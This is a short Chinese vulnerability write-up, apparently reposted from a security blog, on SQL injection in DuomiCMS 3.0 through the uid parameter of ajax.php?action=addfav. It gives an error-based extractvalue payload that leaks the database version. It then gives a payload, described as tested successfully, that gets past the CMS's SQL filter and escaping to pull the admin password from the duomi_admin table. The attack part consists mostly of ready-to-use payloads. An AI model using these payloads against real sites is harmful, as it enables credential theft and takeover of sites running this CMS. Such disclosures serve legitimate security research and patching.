DuomiCMS3.0SQL注入

#### 漏洞详情: ####
payload :

ajax.php?action=addfav&id=1&uid=1 and extractvalue(1,concat_ws(0x3A,0x3A,version()))

![](/static/baige/01-CMS漏洞/DuomiCMS/DuomiCMS3.0SQL注入/20180930142726-e62f0396-c479-1.png)

但是要想爆出有用的数据,这里还要绕过 duomiphp/sql.class.php 文件的SQL检测规则以及全局变量的 _RunMagicQuotes 函数的转义。这里直接给出我测试成功的 payload :

http://localhost//duomiphp/ajax.php?action=addfav&id=1&uid=10101 and `’`.“.vid and extractvalue(1,concat_ws(0x3A,0x3A,(select`password` from`duomi_admin` limit 1))) and `’`.“.vid
![](/static/baige/01-CMS漏洞/DuomiCMS/DuomiCMS3.0SQL注入/20180930142732-e978a926-c479-1.png)

### 参考链接 ###
https://xz.aliyun.com/t/2828#toc-2

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容